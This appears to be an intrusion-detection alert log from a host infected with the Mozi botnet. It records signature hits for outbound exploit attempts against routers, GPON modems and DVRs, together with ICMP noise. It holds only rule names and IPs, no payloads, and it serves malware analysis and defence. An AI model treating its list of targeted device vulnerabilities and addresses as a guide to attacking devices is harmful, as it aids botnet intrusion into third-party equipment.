                                                                                                                        04/25/21-20:59:41.685938ICMP399ICMP Destination Unreachable Host Unreachable5.151.32.163192.168.2.20
                                                                                                                        04/25/21-20:59:41.826887UDP2030919ET TROJAN Mozi Botnet DHT Config Sent25477723202.164.139.206192.168.2.20
                                                                                                                        04/25/21-20:59:42.051319ICMP399ICMP Destination Unreachable Host Unreachable85.97.190.139192.168.2.20
                                                                                                                        04/25/21-20:59:42.051382ICMP399ICMP Destination Unreachable Host Unreachable85.97.190.139192.168.2.20
                                                                                                                        04/25/21-20:59:42.078956ICMP399ICMP Destination Unreachable Host Unreachable94.246.90.74192.168.2.20
                                                                                                                        04/25/21-20:59:42.079016ICMP399ICMP Destination Unreachable Host Unreachable94.246.90.74192.168.2.20
                                                                                                                        04/25/21-20:59:42.079055ICMP399ICMP Destination Unreachable Host Unreachable94.246.90.74192.168.2.20
                                                                                                                        04/25/21-20:59:42.142737ICMP399ICMP Destination Unreachable Host Unreachable69.215.137.98192.168.2.20
                                                                                                                        04/25/21-20:59:42.142830ICMP399ICMP Destination Unreachable Host Unreachable69.215.137.98192.168.2.20
                                                                                                                        04/25/21-20:59:42.142870ICMP399ICMP Destination Unreachable Host Unreachable69.215.137.98192.168.2.20
                                                                                                                        04/25/21-20:59:43.198236UDP2030919ET TROJAN Mozi Botnet DHT Config Sent104817723178.175.72.85192.168.2.20
                                                                                                                        04/25/21-20:59:43.536291UDP2030919ET TROJAN Mozi Botnet DHT Config Sent551847723178.175.58.178192.168.2.20
                                                                                                                        04/25/21-20:59:44.132777ICMP485ICMP Destination Unreachable Communication Administratively Prohibited50.242.148.249192.168.2.20
                                                                                                                        04/25/21-20:59:44.577498UDP2030919ET TROJAN Mozi Botnet DHT Config Sent80817723178.175.113.174192.168.2.20
                                                                                                                        04/25/21-20:59:45.054325ICMP399ICMP Destination Unreachable Host Unreachable85.97.190.139192.168.2.20
                                                                                                                        04/25/21-20:59:46.157236TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4300680192.168.2.20185.29.123.11
                                                                                                                        04/25/21-20:59:46.185716ICMP449ICMP Time-To-Live Exceeded in Transit202.54.6.76192.168.2.20
                                                                                                                        04/25/21-20:59:46.154008TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5672280192.168.2.20164.132.9.223
                                                                                                                        04/25/21-20:59:46.154008TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5672280192.168.2.20164.132.9.223
                                                                                                                        04/25/21-20:59:46.208290TCP1201ATTACK-RESPONSES 403 Forbidden8056722164.132.9.223192.168.2.20
                                                                                                                        04/25/21-20:59:46.157236TCP2025883ET EXPLOIT MVPower DVR Shell UCE4300680192.168.2.20185.29.123.11
                                                                                                                        04/25/21-20:59:46.267892ICMP449ICMP Time-To-Live Exceeded in Transit152.255.134.214192.168.2.20
                                                                                                                        04/25/21-20:59:49.080138ICMP399ICMP Destination Unreachable Host Unreachable149.14.241.170192.168.2.20
                                                                                                                        04/25/21-20:59:49.080185ICMP399ICMP Destination Unreachable Host Unreachable149.14.241.170192.168.2.20
                                                                                                                        04/25/21-20:59:49.080202ICMP399ICMP Destination Unreachable Host Unreachable149.14.241.170192.168.2.20
                                                                                                                        04/25/21-20:59:49.521310TCP2025884ET EXPLOIT Multiple CCTV-DVR Vendors RCE4716681192.168.2.20121.127.241.108
                                                                                                                        04/25/21-20:59:52.259170ICMP449ICMP Time-To-Live Exceeded in Transit181.88.164.5192.168.2.20
                                                                                                                        04/25/21-20:59:53.869487ICMP399ICMP Destination Unreachable Host Unreachable94.190.193.34192.168.2.20
                                                                                                                        04/25/21-20:59:57.525331ICMP485ICMP Destination Unreachable Communication Administratively Prohibited124.75.149.185192.168.2.20
                                                                                                                        04/25/21-21:00:00.015225ICMP485ICMP Destination Unreachable Communication Administratively Prohibited95.248.151.214192.168.2.20
                                                                                                                        04/25/21-21:00:00.026281ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.73.215.131192.168.2.20
                                                                                                                        04/25/21-21:00:00.121413ICMP485ICMP Destination Unreachable Communication Administratively Prohibited172.101.203.193192.168.2.20
                                                                                                                        04/25/21-21:00:00.274251ICMP401ICMP Destination Unreachable Network Unreachable103.105.215.18192.168.2.20
                                                                                                                        04/25/21-21:00:01.017827ICMP401ICMP Destination Unreachable Network Unreachable81.228.85.109192.168.2.20
                                                                                                                        04/25/21-21:00:03.055894ICMP401ICMP Destination Unreachable Network Unreachable91.190.192.194192.168.2.20
                                                                                                                        04/25/21-21:00:04.237092ICMP399ICMP Destination Unreachable Host Unreachable80.81.64.226192.168.2.20
                                                                                                                        04/25/21-21:00:04.237137ICMP399ICMP Destination Unreachable Host Unreachable80.81.64.226192.168.2.20
                                                                                                                        04/25/21-20:59:56.119661TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5025680192.168.2.20217.182.243.67
                                                                                                                        04/25/21-21:00:07.101648ICMP449ICMP Time-To-Live Exceeded in Transit128.5.0.2192.168.2.20
                                                                                                                        04/25/21-21:00:07.155504TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 426725555192.168.2.20146.184.165.4
                                                                                                                        04/25/21-21:00:07.239913ICMP399ICMP Destination Unreachable Host Unreachable80.81.64.226192.168.2.20
                                                                                                                        04/25/21-21:00:07.314313TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4459480192.168.2.20170.246.231.239
                                                                                                                        04/25/21-21:00:07.314313TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4459480192.168.2.20170.246.231.239
                                                                                                                        04/25/21-21:00:07.573455TCP1201ATTACK-RESPONSES 403 Forbidden8044594170.246.231.239192.168.2.20
                                                                                                                        04/25/21-21:00:07.979027ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                        04/25/21-21:00:14.210404ICMP449ICMP Time-To-Live Exceeded in Transit216.241.0.1192.168.2.20
                                                                                                                        04/25/21-21:00:14.226024ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited154.85.133.197192.168.2.20
                                                                                                                        04/25/21-21:00:14.332829ICMP485ICMP Destination Unreachable Communication Administratively Prohibited46.91.195.37192.168.2.20
                                                                                                                        04/25/21-21:00:14.217008TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5675080192.168.2.2050.66.70.68
                                                                                                                        04/25/21-21:00:14.217008TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5675080192.168.2.2050.66.70.68
                                                                                                                        04/25/21-21:00:14.411174TCP1201ATTACK-RESPONSES 403 Forbidden805675050.66.70.68192.168.2.20
                                                                                                                        04/25/21-21:00:14.649448ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.226.148.46192.168.2.20
                                                                                                                        04/25/21-21:00:17.260432ICMP399ICMP Destination Unreachable Host Unreachable201.179.31.173192.168.2.20
                                                                                                                        04/25/21-21:00:17.264622ICMP399ICMP Destination Unreachable Host Unreachable201.179.31.173192.168.2.20
                                                                                                                        04/25/21-21:00:17.267052ICMP399ICMP Destination Unreachable Host Unreachable201.179.31.173192.168.2.20
                                                                                                                        04/25/21-21:00:20.220778ICMP399ICMP Destination Unreachable Host Unreachable112.188.108.38192.168.2.20
                                                                                                                        04/25/21-21:00:21.068281ICMP449ICMP Time-To-Live Exceeded in Transit62.162.61.218192.168.2.20
                                                                                                                        04/25/21-21:00:21.233274ICMP485ICMP Destination Unreachable Communication Administratively Prohibited113.131.128.13192.168.2.20
                                                                                                                        04/25/21-21:00:21.372390ICMP399ICMP Destination Unreachable Host Unreachable4.14.78.162192.168.2.20
                                                                                                                        04/25/21-21:00:21.243808TCP2025884ET EXPLOIT Multiple CCTV-DVR Vendors RCE5626881192.168.2.20115.87.204.89
                                                                                                                        04/25/21-21:00:24.053624ICMP401ICMP Destination Unreachable Network Unreachable81.228.84.85192.168.2.20
                                                                                                                        04/25/21-21:00:24.088537TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution3581480192.168.2.2035.244.243.215
                                                                                                                        04/25/21-21:00:14.175795TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4194680192.168.2.2045.65.120.55
                                                                                                                        04/25/21-21:00:25.724015ICMP399ICMP Destination Unreachable Host Unreachable82.142.138.154192.168.2.20
                                                                                                                        04/25/21-21:00:27.154348ICMP399ICMP Destination Unreachable Host Unreachable24.30.172.166192.168.2.20
                                                                                                                        04/25/21-21:00:28.182343TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3344080192.168.2.2023.207.67.88
                                                                                                                        04/25/21-21:00:28.182343TCP2025883ET EXPLOIT MVPower DVR Shell UCE3344080192.168.2.2023.207.67.88
                                                                                                                        04/25/21-21:00:28.330233TCP1200ATTACK-RESPONSES Invalid URL803344023.207.67.88192.168.2.20
                                                                                                                        04/25/21-21:00:29.091592ICMP399ICMP Destination Unreachable Host Unreachable68.87.208.178192.168.2.20
                                                                                                                        04/25/21-21:00:31.228905ICMP399ICMP Destination Unreachable Host Unreachable112.189.50.34192.168.2.20
                                                                                                                        04/25/21-21:00:31.158554TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4316480192.168.2.20146.158.12.4
                                                                                                                        04/25/21-21:00:32.314532TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3603480192.168.2.2023.217.112.105
                                                                                                                        04/25/21-21:00:32.314532TCP2025883ET EXPLOIT MVPower DVR Shell UCE3603480192.168.2.2023.217.112.105
                                                                                                                        04/25/21-21:00:32.599732TCP1200ATTACK-RESPONSES Invalid URL803603423.217.112.105192.168.2.20
                                                                                                                        04/25/21-21:00:35.002235ICMP399ICMP Destination Unreachable Host Unreachable77.56.7.184192.168.2.20
                                                                                                                        04/25/21-21:00:35.246262ICMP449ICMP Time-To-Live Exceeded in Transit211.231.190.194192.168.2.20
                                                                                                                        04/25/21-21:00:38.077950ICMP399ICMP Destination Unreachable Host Unreachable197.50.187.242192.168.2.20
                                                                                                                        04/25/21-21:00:38.078445ICMP399ICMP Destination Unreachable Host Unreachable197.50.187.242192.168.2.20
                                                                                                                        04/25/21-21:00:38.080207ICMP399ICMP Destination Unreachable Host Unreachable197.50.187.242192.168.2.20
                                                                                                                        04/25/21-21:00:42.433771ICMP399ICMP Destination Unreachable Host Unreachable4.26.32.97192.168.2.20
                                                                                                                        04/25/21-21:00:42.433815ICMP399ICMP Destination Unreachable Host Unreachable4.26.32.97192.168.2.20
                                                                                                                        04/25/21-21:00:42.433952ICMP399ICMP Destination Unreachable Host Unreachable4.26.32.97192.168.2.20
                                                                                                                        04/25/21-21:00:45.219128ICMP399ICMP Destination Unreachable Host Unreachable202.4.124.214192.168.2.20
                                                                                                                        04/25/21-21:00:46.343458TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)496468080192.168.2.20175.234.128.97
                                                                                                                        04/25/21-21:00:46.343458TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)496468080192.168.2.20175.234.128.97
                                                                                                                        04/25/21-21:00:49.254402TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5088680192.168.2.2044.239.233.229
                                                                                                                        04/25/21-21:00:49.254402TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5088680192.168.2.2044.239.233.229
                                                                                                                        04/25/21-21:00:53.007619ICMP401ICMP Destination Unreachable Network Unreachable81.21.200.33192.168.2.20
                                                                                                                        04/25/21-21:00:54.229785TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4162280192.168.2.2013.126.136.27
                                                                                                                        04/25/21-21:00:54.229785TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4162280192.168.2.2013.126.136.27
                                                                                                                        04/25/21-21:00:55.992046ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.208.169.116192.168.2.20
                                                                                                                        04/25/21-21:00:56.093609ICMP485ICMP Destination Unreachable Communication Administratively Prohibited24.89.194.122192.168.2.20
                                                                                                                        04/25/21-21:00:57.074129ICMP399ICMP Destination Unreachable Host Unreachable10.115.56.77192.168.2.20
                                                                                                                        04/25/21-21:01:03.355983TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4049080192.168.2.2023.76.236.93
                                                                                                                        04/25/21-21:01:03.597138ICMP449ICMP Time-To-Live Exceeded in Transit219.143.103.106192.168.2.20
                                                                                                                        04/25/21-21:01:03.355983TCP2025883ET EXPLOIT MVPower DVR Shell UCE4049080192.168.2.2023.76.236.93
                                                                                                                        04/25/21-21:01:03.669007TCP1200ATTACK-RESPONSES Invalid URL804049023.76.236.93192.168.2.20
                                                                                                                        04/25/21-21:01:06.004230ICMP399ICMP Destination Unreachable Host Unreachable83.168.243.154192.168.2.20
                                                                                                                        04/25/21-21:01:06.144081ICMP399ICMP Destination Unreachable Host Unreachable103.111.192.23192.168.2.20
                                                                                                                        04/25/21-21:01:06.144134ICMP399ICMP Destination Unreachable Host Unreachable103.111.192.23192.168.2.20
                                                                                                                        04/25/21-21:01:06.240356ICMP449ICMP Time-To-Live Exceeded in Transit41.197.4.18192.168.2.20
                                                                                                                        04/25/21-21:01:09.142400ICMP399ICMP Destination Unreachable Host Unreachable103.111.192.23192.168.2.20
                                                                                                                        04/25/21-21:01:09.999567ICMP485ICMP Destination Unreachable Communication Administratively Prohibited82.135.69.230192.168.2.20
                                                                                                                        04/25/21-21:01:10.119604ICMP399ICMP Destination Unreachable Host Unreachable167.142.21.179192.168.2.20
                                                                                                                        04/25/21-21:01:10.153289ICMP402ICMP Destination Unreachable Port Unreachable50.65.30.97192.168.2.20
                                                                                                                        04/25/21-21:01:13.250934ICMP399ICMP Destination Unreachable Host Unreachable199.115.56.53192.168.2.20
                                                                                                                        04/25/21-21:01:13.250977ICMP399ICMP Destination Unreachable Host Unreachable199.115.56.53192.168.2.20
                                                                                                                        04/25/21-21:01:13.251002ICMP399ICMP Destination Unreachable Host Unreachable199.115.56.53192.168.2.20
                                                                                                                        04/25/21-21:01:14.120372ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.107192.168.2.20
                                                                                                                        04/25/21-21:01:14.120415ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.107192.168.2.20
                                                                                                                        04/25/21-21:01:17.054952ICMP401ICMP Destination Unreachable Network Unreachable84.17.32.179192.168.2.20
                                                                                                                        04/25/21-21:01:17.120274ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.107192.168.2.20
                                                                                                                        04/25/21-21:01:17.156553ICMP399ICMP Destination Unreachable Host Unreachable64.59.147.242192.168.2.20
                                                                                                                        04/25/21-21:01:20.214379ICMP399ICMP Destination Unreachable Host Unreachable202.150.223.106192.168.2.20
                                                                                                                        04/25/21-21:01:20.214459ICMP399ICMP Destination Unreachable Host Unreachable202.150.223.106192.168.2.20
                                                                                                                        04/25/21-21:01:21.983398ICMP485ICMP Destination Unreachable Communication Administratively Prohibited188.126.172.52192.168.2.20
                                                                                                                        04/25/21-21:01:23.214334ICMP399ICMP Destination Unreachable Host Unreachable202.150.223.106192.168.2.20
                                                                                                                        04/25/21-21:01:24.004183ICMP485ICMP Destination Unreachable Communication Administratively Prohibited77.9.65.166192.168.2.20
                                                                                                                        04/25/21-21:01:24.073255ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.97.108.253192.168.2.20
                                                                                                                        04/25/21-21:01:24.115828ICMP401ICMP Destination Unreachable Network Unreachable190.5.88.118192.168.2.20
                                                                                                                        04/25/21-21:01:26.983023ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                        04/25/21-21:01:27.084111ICMP401ICMP Destination Unreachable Network Unreachable67.204.13.138192.168.2.20
                                                                                                                        04/25/21-21:01:30.992923ICMP399ICMP Destination Unreachable Host Unreachable83.85.190.66192.168.2.20
                                                                                                                        04/25/21-21:01:31.078519ICMP449ICMP Time-To-Live Exceeded in Transit207.190.193.72192.168.2.20
                                                                                                                        04/25/21-21:01:34.042186ICMP449ICMP Time-To-Live Exceeded in Transit10.255.255.1192.168.2.20
                                                                                                                        04/25/21-21:01:34.311536ICMP399ICMP Destination Unreachable Host Unreachable10.200.30.1192.168.2.20
                                                                                                                        04/25/21-21:01:34.311563ICMP399ICMP Destination Unreachable Host Unreachable10.200.30.1192.168.2.20
                                                                                                                        04/25/21-21:01:34.311574ICMP399ICMP Destination Unreachable Host Unreachable10.200.30.1192.168.2.20
                                                                                                                        04/25/21-21:01:34.999285ICMP399ICMP Destination Unreachable Host Unreachable95.128.48.59192.168.2.20
                                                                                                                        04/25/21-21:01:34.999322ICMP399ICMP Destination Unreachable Host Unreachable95.128.48.59192.168.2.20
                                                                                                                        04/25/21-21:01:34.999339ICMP399ICMP Destination Unreachable Host Unreachable95.128.48.59192.168.2.20
                                                                                                                        04/25/21-21:01:38.006823ICMP485ICMP Destination Unreachable Communication Administratively Prohibited81.173.167.44192.168.2.20
                                                                                                                        04/25/21-21:01:41.045861ICMP401ICMP Destination Unreachable Network Unreachable212.156.201.116192.168.2.20
                                                                                                                        04/25/21-21:01:41.225814ICMP399ICMP Destination Unreachable Host Unreachable211.35.69.174192.168.2.20
                                                                                                                        04/25/21-21:01:41.225857ICMP399ICMP Destination Unreachable Host Unreachable211.35.69.174192.168.2.20
                                                                                                                        04/25/21-21:01:44.235810ICMP399ICMP Destination Unreachable Host Unreachable211.35.69.174192.168.2.20
                                                                                                                        04/25/21-21:01:44.980122ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.144.72.42192.168.2.20
                                                                                                                        04/25/21-21:01:44.985433ICMP485ICMP Destination Unreachable Communication Administratively Prohibited188.105.63.155192.168.2.20
                                                                                                                        04/25/21-21:01:45.054279TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3938680192.168.2.20178.79.174.158
                                                                                                                        04/25/21-21:01:45.054279TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3938680192.168.2.20178.79.174.158
                                                                                                                        04/25/21-21:01:45.111542ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.39192.168.2.20
                                                                                                                        04/25/21-21:01:45.111557ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.39192.168.2.20
                                                                                                                        04/25/21-21:01:45.502289ICMP449ICMP Time-To-Live Exceeded in Transit189.90.245.50192.168.2.20
                                                                                                                        04/25/21-21:01:48.098963ICMP399ICMP Destination Unreachable Host Unreachable10.140.8.54192.168.2.20
                                                                                                                        04/25/21-21:01:48.099232ICMP399ICMP Destination Unreachable Host Unreachable10.140.8.54192.168.2.20
                                                                                                                        04/25/21-21:01:48.111040ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.39192.168.2.20
                                                                                                                        04/25/21-21:01:48.159696ICMP449ICMP Time-To-Live Exceeded in Transit184.104.216.34192.168.2.20
                                                                                                                        04/25/21-21:01:48.187864ICMP449ICMP Time-To-Live Exceeded in Transit196.0.1.217192.168.2.20
                                                                                                                        04/25/21-21:01:51.108862ICMP399ICMP Destination Unreachable Host Unreachable10.140.8.54192.168.2.20
                                                                                                                        04/25/21-21:01:51.995963ICMP485ICMP Destination Unreachable Communication Administratively Prohibited95.33.211.220192.168.2.20
                                                                                                                        04/25/21-21:01:55.274446UDP2030919ET TROJAN Mozi Botnet DHT Config Sent276977723120.193.91.233192.168.2.20
                                                                                                                        04/25/21-21:01:55.804836UDP2030919ET TROJAN Mozi Botnet DHT Config Sent80827723178.175.94.73192.168.2.20
                                                                                                                        04/25/21-21:01:57.084893ICMP449ICMP Time-To-Live Exceeded in Transit185.30.15.82192.168.2.20
                                                                                                                        04/25/21-21:01:59.062647ICMP485ICMP Destination Unreachable Communication Administratively Prohibited50.220.200.185192.168.2.20
                                                                                                                        04/25/21-21:01:59.083143TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3913880192.168.2.2079.171.18.106
                                                                                                                        04/25/21-21:01:59.083143TCP2025883ET EXPLOIT MVPower DVR Shell UCE3913880192.168.2.2079.171.18.106
                                                                                                                        04/25/21-21:01:59.196429ICMP449ICMP Time-To-Live Exceeded in Transit10.250.1.233192.168.2.20
                                                                                                                        04/25/21-21:01:59.213403TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4101880192.168.2.20166.88.243.237
                                                                                                                        04/25/21-21:02:02.049693ICMP399ICMP Destination Unreachable Host Unreachable79.132.207.82192.168.2.20
                                                                                                                        04/25/21-21:02:02.049748ICMP399ICMP Destination Unreachable Host Unreachable79.132.207.82192.168.2.20
                                                                                                                        04/25/21-21:02:02.623606ICMP399ICMP Destination Unreachable Host Unreachable92.244.96.20192.168.2.20
                                                                                                                        04/25/21-21:02:04.125296ICMP449ICMP Time-To-Live Exceeded in Transit130.254.252.50192.168.2.20
                                                                                                                        04/25/21-21:02:05.047370ICMP399ICMP Destination Unreachable Host Unreachable79.132.207.82192.168.2.20
                                                                                                                        04/25/21-21:02:05.217702ICMP399ICMP Destination Unreachable Host Unreachable177.87.147.190192.168.2.20
                                                                                                                        04/25/21-21:02:05.217751ICMP399ICMP Destination Unreachable Host Unreachable177.87.147.190192.168.2.20
                                                                                                                        04/25/21-21:02:05.173824TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound3860080192.168.2.2051.83.246.144
                                                                                                                        04/25/21-21:02:05.173824TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution3860080192.168.2.2051.83.246.144
                                                                                                                        04/25/21-21:02:08.216923ICMP399ICMP Destination Unreachable Host Unreachable177.87.147.190192.168.2.20
                                                                                                                        04/25/21-21:02:09.278458ICMP449ICMP Time-To-Live Exceeded in Transit148.182.27.67192.168.2.20
                                                                                                                        04/25/21-21:02:09.449246UDP2030919ET TROJAN Mozi Botnet DHT Config Sent177937723116.68.110.157192.168.2.20
                                                                                                                        04/25/21-21:02:09.281324TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)434748080192.168.2.20166.88.120.253
                                                                                                                        04/25/21-21:02:09.281324TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)434748080192.168.2.20166.88.120.253
                                                                                                                        04/25/21-21:02:09.702193TCP1200ATTACK-RESPONSES Invalid URL808043474166.88.120.253192.168.2.20
                                                                                                                        04/25/21-21:02:10.282130ICMP449ICMP Time-To-Live Exceeded in Transit148.182.27.67192.168.2.20
                                                                                                                        04/25/21-21:02:12.280417ICMP449ICMP Time-To-Live Exceeded in Transit148.182.27.67192.168.2.20
                                                                                                                        04/25/21-21:02:12.985212ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.23.252.43192.168.2.20
                                                                                                                        04/25/21-21:02:13.128888ICMP399ICMP Destination Unreachable Host Unreachable104.158.23.10192.168.2.20
                                                                                                                        04/25/21-21:02:20.066616TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound405928080192.168.2.2095.8.122.63
                                                                                                                        04/25/21-21:02:20.066616TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution405928080192.168.2.2095.8.122.63
                                                                                                                        04/25/21-21:02:23.276201TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4592280192.168.2.20104.80.82.152
                                                                                                                        04/25/21-21:02:23.276201TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4592280192.168.2.20104.80.82.152
                                                                                                                        04/25/21-21:02:23.535921TCP1200ATTACK-RESPONSES Invalid URL8045922104.80.82.152192.168.2.20
                                                                                                                        04/25/21-21:02:24.752116ICMP399ICMP Destination Unreachable Host Unreachable133.72.221.62192.168.2.20
                                                                                                                        04/25/21-21:02:24.752166ICMP399ICMP Destination Unreachable Host Unreachable133.72.221.62192.168.2.20
                                                                                                                        04/25/21-21:02:24.752191ICMP399ICMP Destination Unreachable Host Unreachable133.72.221.62192.168.2.20
                                                                                                                        04/25/21-21:02:26.150621ICMP449ICMP Time-To-Live Exceeded in Transit193.106.112.197192.168.2.20
                                                                                                                        04/25/21-21:02:30.060165ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited149.104.34.37192.168.2.20
                                                                                                                        04/25/21-21:02:30.497156TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound3685280192.168.2.20157.65.87.141
                                                                                                                        04/25/21-21:02:30.497156TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution3685280192.168.2.20157.65.87.141
                                                                                                                        04/25/21-21:02:32.107275ICMP401ICMP Destination Unreachable Network Unreachable128.233.16.2192.168.2.20
                                                                                                                        04/25/21-21:02:34.124473ICMP449ICMP Time-To-Live Exceeded in Transit207.80.111.129192.168.2.20
                                                                                                                        04/25/21-21:02:34.567008TCP1200ATTACK-RESPONSES Invalid URL804026023.40.37.31192.168.2.20
                                                                                                                        04/25/21-21:02:36.978608ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.57.107.2192.168.2.20
                                                                                                                        04/25/21-21:02:37.059786ICMP399ICMP Destination Unreachable Host Unreachable78.188.172.72192.168.2.20
                                                                                                                        04/25/21-21:02:37.061247ICMP399ICMP Destination Unreachable Host Unreachable78.188.172.72192.168.2.20
                                                                                                                        04/25/21-21:02:37.062282ICMP399ICMP Destination Unreachable Host Unreachable78.188.172.72192.168.2.20
                                                                                                                        04/25/21-21:02:37.245281ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited153.126.135.194192.168.2.20
                                                                                                                        04/25/21-21:02:40.067659ICMP399ICMP Destination Unreachable Host Unreachable12.86.66.178192.168.2.20
                                                                                                                        04/25/21-21:02:40.067687ICMP399ICMP Destination Unreachable Host Unreachable12.86.66.178192.168.2.20
                                                                                                                        04/25/21-21:02:40.985795ICMP399ICMP Destination Unreachable Host Unreachable86.79.158.149192.168.2.20
                                                                                                                        04/25/21-21:02:40.995546ICMP402ICMP Destination Unreachable Port Unreachable81.19.132.11192.168.2.20
                                                                                                                        04/25/21-21:02:41.290526TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6010680192.168.2.20154.90.79.101
                                                                                                                        04/25/21-21:02:41.290526TCP2025883ET EXPLOIT MVPower DVR Shell UCE6010680192.168.2.20154.90.79.101
                                                                                                                        04/25/21-21:02:42.449283ICMP399ICMP Destination Unreachable Host Unreachable74.128.5.50192.168.2.20
                                                                                                                        04/25/21-21:02:43.071814ICMP399ICMP Destination Unreachable Host Unreachable12.86.66.178192.168.2.20
                                                                                                                        04/25/21-21:02:44.249950ICMP399ICMP Destination Unreachable Host Unreachable118.23.54.58192.168.2.20
                                                                                                                        04/25/21-21:02:45.166823ICMP485ICMP Destination Unreachable Communication Administratively Prohibited178.8.127.178192.168.2.20
                                                                                                                        04/25/21-21:02:51.205073ICMP399ICMP Destination Unreachable Host Unreachable118.174.219.254192.168.2.20
                                                                                                                        04/25/21-21:02:51.205125ICMP399ICMP Destination Unreachable Host Unreachable118.174.219.254192.168.2.20
                                                                                                                        04/25/21-21:02:53.411910ICMP399ICMP Destination Unreachable Host Unreachable93.124.251.100192.168.2.20
                                                                                                                        04/25/21-21:02:53.411971ICMP399ICMP Destination Unreachable Host Unreachable93.124.251.100192.168.2.20
                                                                                                                        04/25/21-21:02:54.204802ICMP399ICMP Destination Unreachable Host Unreachable118.174.219.254192.168.2.20
                                                                                                                        04/25/21-21:02:54.126270TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4213480192.168.2.2023.34.199.82
                                                                                                                        04/25/21-21:02:54.126270TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4213480192.168.2.2023.34.199.82
                                                                                                                        04/25/21-21:02:54.262256TCP1200ATTACK-RESPONSES Invalid URL804213423.34.199.82192.168.2.20
                                                                                                                        04/25/21-21:02:54.967204ICMP399ICMP Destination Unreachable Host Unreachable81.210.132.145192.168.2.20
                                                                                                                        04/25/21-21:02:55.106570ICMP449ICMP Time-To-Live Exceeded in Transit205.158.53.46192.168.2.20
                                                                                                                        04/25/21-21:02:56.481503ICMP399ICMP Destination Unreachable Host Unreachable93.124.251.100192.168.2.20
                                                                                                                        04/25/21-21:02:59.044363ICMP399ICMP Destination Unreachable Host Unreachable62.59.216.25192.168.2.20
                                                                                                                        04/25/21-21:02:59.044405ICMP399ICMP Destination Unreachable Host Unreachable62.59.216.25192.168.2.20
                                                                                                                        04/25/21-21:02:59.044430ICMP399ICMP Destination Unreachable Host Unreachable62.59.216.25192.168.2.20
                                                                                                                        04/25/21-21:02:59.445736ICMP399ICMP Destination Unreachable Host Unreachable159.20.31.42192.168.2.20
                                                                                                                        04/25/21-21:02:59.445793ICMP399ICMP Destination Unreachable Host Unreachable159.20.31.42192.168.2.20
                                                                                                                        04/25/21-21:02:59.445818ICMP399ICMP Destination Unreachable Host Unreachable159.20.31.42192.168.2.20
                                                                                                                        04/25/21-21:02:58.345164TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4304880192.168.2.20133.137.248.191
                                                                                                                        04/25/21-21:02:34.292520TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4026080192.168.2.2023.40.37.31
                                                                                                                        04/25/21-21:02:16.245213TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution3517880192.168.2.2018.228.54.139
                                                                                                                        04/25/21-21:01:19.135196TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution6099880192.168.2.2081.7.8.12
